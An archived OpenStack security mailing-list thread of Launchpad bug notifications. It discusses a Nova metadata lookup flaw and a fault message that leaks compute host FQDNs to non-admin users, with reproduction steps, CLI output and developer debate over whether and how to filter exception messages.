From 1841933 at bugs.launchpad.net Tue Nov 5 11:06:30 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 05 Nov 2019 11:06:30 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <157295199189.28669.6384001232669447033.launchpad@chaenomeles.canonical.com> ** Changed in: nova Assignee: Kobi Samoray (ksamoray) => Adit Sarfaty (asarfaty) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From smooney at redhat.com Thu Nov 7 18:47:36 2019 From: smooney at redhat.com (sean mooney) Date: Thu, 07 Nov 2019 18:47:36 -0000 Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com> Message-ID: <157315245699.28442.3927898175786111811.malone@chaenomeles.canonical.com> did we not just fix a cve that was very similar to this where we were passing exceptions back when we failed to connect ceph leaking the ceph mon info. granted that is available the attachment details but this feels similar in that we are exposing the compute node fqdn ** Tags added: security ** Information type changed from Public to Public Security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1851587 Title: HypervisorUnavailable error leaks compute host fqdn to non-admin users Status in OpenStack Compute (nova): New Bug description: Description =========== When an instance encounters a HypervisorUnavailable error, the non-admin user gets the info of the compute host fqdn in the error message. Steps to reproduce ================== 1. Spin up an instance with non-admin user credentials 2. To reproduce the error, stop the libvirtd service on the compute host containing instance 3. Delete the instance 4. Deletion fails providing HypervisorUnavailable error Expected result =============== Error does not show compute host fqdn to a non-admin user Actual result ============= #spin up an instance +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None | Running | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ #instance is running on compute-0 node (only admin knows this) [heat-admin at compute-0 ~]$ sudo virsh list --all Id Name State ---------------------------------------------------- 108 instance-00000092 running #stop libvirtd service [root at compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service [root at compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service ● tripleo_nova_libvirt.service - nova_libvirt container Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled) Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS) Main PID: 3783 Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl> Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb) Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container. Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container... Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container. #delete the instance, it leaks compute host fqdn to the non-admin user (overcloud) [stack at undercloud-0 ~]$ nova delete test-11869 Request to delete server test-11869 has been accepted. (overcloud) [stack at undercloud-0 ~]$ openstack server list --long +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR | None | Running | | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ (overcloud) [stack at undercloud-0 ~]$ openstack server show test-11869 <---debug output attached in logs +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | Field | Value | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | OS-DCF:diskConfig | MANUAL | | OS-EXT-AZ:availability_zone | nova | | OS-EXT-STS:power_state | Running | | OS-EXT-STS:task_state | None | | OS-EXT-STS:vm_state | error | | OS-SRV-USG:launched_at | 2019-11-06T22:13:08.000000 | | OS-SRV-USG:terminated_at | None | | accessIPv4 | | | accessIPv6 | | | addresses | | | config_drive | | | created | 2019-11-06T22:12:57Z | | description | None | | fault | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} | | flavor | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' | | hostId | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 | | id | 4f42886d-e1f8-4607-a09d-0dc12a681880 | | image | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) | | key_name | None | | locked | False | | locked_reason | None | | name | test-11869 | | project_id | 6e39619e17a9478580c93120e1cb16bc | | properties | | | server_groups | [] | | status | ERROR | | tags | [] | | trusted_image_certificates | None | | updated | 2019-11-06T23:01:45Z | | user_id | 3cd6a8cb88eb49d3a84f9e67d89df598 | | volumes_attached | | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions From 1851587 at bugs.launchpad.net Thu Nov 7 18:57:40 2019 From: 1851587 at bugs.launchpad.net (Archit Modi) Date: Thu, 07 Nov 2019 18:57:40 -0000 Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com> Message-ID: <157315306057.3468.10650597284654450566.malone@gac.canonical.com> This was found during validation of that CVE and we discussed as this issue being tracked separately and not considered as a CVE -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1851587 Title: HypervisorUnavailable error leaks compute host fqdn to non-admin users Status in OpenStack Compute (nova): New Bug description: Description =========== When an instance encounters a HypervisorUnavailable error, the non-admin user gets the info of the compute host fqdn in the error message. Steps to reproduce ================== 1. Spin up an instance with non-admin user credentials 2. To reproduce the error, stop the libvirtd service on the compute host containing instance 3. Delete the instance 4. Deletion fails providing HypervisorUnavailable error Expected result =============== Error does not show compute host fqdn to a non-admin user Actual result ============= #spin up an instance +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None | Running | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ #instance is running on compute-0 node (only admin knows this) [heat-admin at compute-0 ~]$ sudo virsh list --all Id Name State ---------------------------------------------------- 108 instance-00000092 running #stop libvirtd service [root at compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service [root at compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service ● tripleo_nova_libvirt.service - nova_libvirt container Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled) Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS) Main PID: 3783 Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl> Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb) Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container. Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container... Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container. #delete the instance, it leaks compute host fqdn to the non-admin user (overcloud) [stack at undercloud-0 ~]$ nova delete test-11869 Request to delete server test-11869 has been accepted. (overcloud) [stack at undercloud-0 ~]$ openstack server list --long +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR | None | Running | | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ (overcloud) [stack at undercloud-0 ~]$ openstack server show test-11869 <---debug output attached in logs +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | Field | Value | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | OS-DCF:diskConfig | MANUAL | | OS-EXT-AZ:availability_zone | nova | | OS-EXT-STS:power_state | Running | | OS-EXT-STS:task_state | None | | OS-EXT-STS:vm_state | error | | OS-SRV-USG:launched_at | 2019-11-06T22:13:08.000000 | | OS-SRV-USG:terminated_at | None | | accessIPv4 | | | accessIPv6 | | | addresses | | | config_drive | | | created | 2019-11-06T22:12:57Z | | description | None | | fault | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} | | flavor | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' | | hostId | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 | | id | 4f42886d-e1f8-4607-a09d-0dc12a681880 | | image | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) | | key_name | None | | locked | False | | locked_reason | None | | name | test-11869 | | project_id | 6e39619e17a9478580c93120e1cb16bc | | properties | | | server_groups | [] | | status | ERROR | | tags | [] | | trusted_image_certificates | None | | updated | 2019-11-06T23:01:45Z | | user_id | 3cd6a8cb88eb49d3a84f9e67d89df598 | | volumes_attached | | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions From 1851587 at bugs.launchpad.net Thu Nov 7 19:16:33 2019 From: 1851587 at bugs.launchpad.net (melanie witt) Date: Thu, 07 Nov 2019 19:16:33 -0000 Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com> Message-ID: <157315419353.19587.14586136077430577119.malone@wampee.canonical.com> Yup, what Archit said. To be a bit more verbose, the original CVE was about leaking the ceph monitor IP address and while we were verifying the fix for the original CVE, we stopped libvirtd to cause a server fault and repro the original bug. But stopping libvirtd resulted in the "Connection to the hypervisor is broken" state and we inadvertently exposed the HypervisorUnavailable exception containing the compute host FQDN. So, Archit has followed up on that and written it up as a different issue. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1851587 Title: HypervisorUnavailable error leaks compute host fqdn to non-admin users Status in OpenStack Compute (nova): New Bug description: Description =========== When an instance encounters a HypervisorUnavailable error, the non-admin user gets the info of the compute host fqdn in the error message. Steps to reproduce ================== 1. Spin up an instance with non-admin user credentials 2. To reproduce the error, stop the libvirtd service on the compute host containing instance 3. Delete the instance 4. Deletion fails providing HypervisorUnavailable error Expected result =============== Error does not show compute host fqdn to a non-admin user Actual result ============= #spin up an instance +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None | Running | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ #instance is running on compute-0 node (only admin knows this) [heat-admin at compute-0 ~]$ sudo virsh list --all Id Name State ---------------------------------------------------- 108 instance-00000092 running #stop libvirtd service [root at compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service [root at compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service ● tripleo_nova_libvirt.service - nova_libvirt container Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled) Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS) Main PID: 3783 Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl> Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb) Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container. Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container... Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container. #delete the instance, it leaks compute host fqdn to the non-admin user (overcloud) [stack at undercloud-0 ~]$ nova delete test-11869 Request to delete server test-11869 has been accepted. (overcloud) [stack at undercloud-0 ~]$ openstack server list --long +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR | None | Running | | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ (overcloud) [stack at undercloud-0 ~]$ openstack server show test-11869 <---debug output attached in logs +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | Field | Value | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | OS-DCF:diskConfig | MANUAL | | OS-EXT-AZ:availability_zone | nova | | OS-EXT-STS:power_state | Running | | OS-EXT-STS:task_state | None | | OS-EXT-STS:vm_state | error | | OS-SRV-USG:launched_at | 2019-11-06T22:13:08.000000 | | OS-SRV-USG:terminated_at | None | | accessIPv4 | | | accessIPv6 | | | addresses | | | config_drive | | | created | 2019-11-06T22:12:57Z | | description | None | | fault | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} | | flavor | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' | | hostId | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 | | id | 4f42886d-e1f8-4607-a09d-0dc12a681880 | | image | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) | | key_name | None | | locked | False | | locked_reason | None | | name | test-11869 | | project_id | 6e39619e17a9478580c93120e1cb16bc | | properties | | | server_groups | [] | | status | ERROR | | tags | [] | | trusted_image_certificates | None | | updated | 2019-11-06T23:01:45Z | | user_id | 3cd6a8cb88eb49d3a84f9e67d89df598 | | volumes_attached | | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions From fungi at yuggoth.org Fri Nov 8 04:44:30 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 08 Nov 2019 04:44:30 -0000 Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com> Message-ID: <157318827080.29920.7734012574667072030.malone@soybean.canonical.com> Per bug 1837877 this can be treated as a hardening opportunity, but no further advisory should be needed. ** Also affects: ossa Importance: Undecided Status: New ** Changed in: ossa Status: New => Won't Fix ** Information type changed from Public Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1851587 Title: HypervisorUnavailable error leaks compute host fqdn to non-admin users Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== When an instance encounters a HypervisorUnavailable error, the non-admin user gets the info of the compute host fqdn in the error message. Steps to reproduce ================== 1. Spin up an instance with non-admin user credentials 2. To reproduce the error, stop the libvirtd service on the compute host containing instance 3. Delete the instance 4. Deletion fails providing HypervisorUnavailable error Expected result =============== Error does not show compute host fqdn to a non-admin user Actual result ============= #spin up an instance +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None | Running | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ #instance is running on compute-0 node (only admin knows this) [heat-admin at compute-0 ~]$ sudo virsh list --all Id Name State ---------------------------------------------------- 108 instance-00000092 running #stop libvirtd service [root at compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service [root at compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service ● tripleo_nova_libvirt.service - nova_libvirt container Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled) Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS) Main PID: 3783 Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl> Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb) Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container. Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container... Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container. #delete the instance, it leaks compute host fqdn to the non-admin user (overcloud) [stack at undercloud-0 ~]$ nova delete test-11869 Request to delete server test-11869 has been accepted. (overcloud) [stack at undercloud-0 ~]$ openstack server list --long +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR | None | Running | | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ (overcloud) [stack at undercloud-0 ~]$ openstack server show test-11869 <---debug output attached in logs +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | Field | Value | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | OS-DCF:diskConfig | MANUAL | | OS-EXT-AZ:availability_zone | nova | | OS-EXT-STS:power_state | Running | | OS-EXT-STS:task_state | None | | OS-EXT-STS:vm_state | error | | OS-SRV-USG:launched_at | 2019-11-06T22:13:08.000000 | | OS-SRV-USG:terminated_at | None | | accessIPv4 | | | accessIPv6 | | | addresses | | | config_drive | | | created | 2019-11-06T22:12:57Z | | description | None | | fault | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} | | flavor | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' | | hostId | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 | | id | 4f42886d-e1f8-4607-a09d-0dc12a681880 | | image | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) | | key_name | None | | locked | False | | locked_reason | None | | name | test-11869 | | project_id | 6e39619e17a9478580c93120e1cb16bc | | properties | | | server_groups | [] | | status | ERROR | | tags | [] | | trusted_image_certificates | None | | updated | 2019-11-06T23:01:45Z | | user_id | 3cd6a8cb88eb49d3a84f9e67d89df598 | | volumes_attached | | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions From mriedem.os at gmail.com Fri Nov 8 14:36:37 2019 From: mriedem.os at gmail.com (Matt Riedemann) Date: Fri, 08 Nov 2019 14:36:37 -0000 Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com> Message-ID: <157322379756.22036.12403441954132321400.malone@soybean.canonical.com> >From the fix for bug 1837877 https://review.opendev.org/#/c/674821/: "Note that nova exceptions with a %(reason)s replacement variable could potentially be leaking sensitive details as well but those would need to be cleaned up on a case-by-case basis since we don't want to change the behavior of all fault messages otherwise users might not see information like NoValidHost when their server goes to ERROR status during scheduling." In this case HypervisorUnavailable is a NovaException so it's treated differently: https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/exception.py#L508 As I said above, this could likely show up in fault messages in a lot of places where the ComputeManager uses the wrap_instance_fault decorator to inject a fault on exceptions getting raised and anything that changes the instance status to ERROR, e.g. failed rebuild: https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/compute/manager.py#L3061 https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/compute/manager.py#L3145 So one question is, do we need to start whitelisting certain exceptions? And if we do, how? Because the API will always show the message: https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/api/openstack/compute/views/servers.py#L331 but only show the details (traceback) for admins and non-500 (I guess, that's weird) error cases: https://github.com/openstack/nova/blob/a90fe1951200ebd27fe74788c0a96c01104ac2cf/nova/api/openstack/compute/views/servers.py#L341 When I was working on the CVE fix above, it's complicated to know from the point that we inject the fault what should be shown based on context.is_admin because an admin could be rebuilding some non-admin's server, so we can't really base things on that. If we only showed the fault message in the API for admins in 500 code cases, then non-admin users will no longer see NoValidHost. Do we need to get so granular that we need to set an attribute on each class of nova exception indicating if its fault message can be exposed to non-admins? That would be hard to maintain I imagine, but maybe it would just start with HypervisorUnavailable and we build on that for other known types of nova exceptions that leak host details? -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to 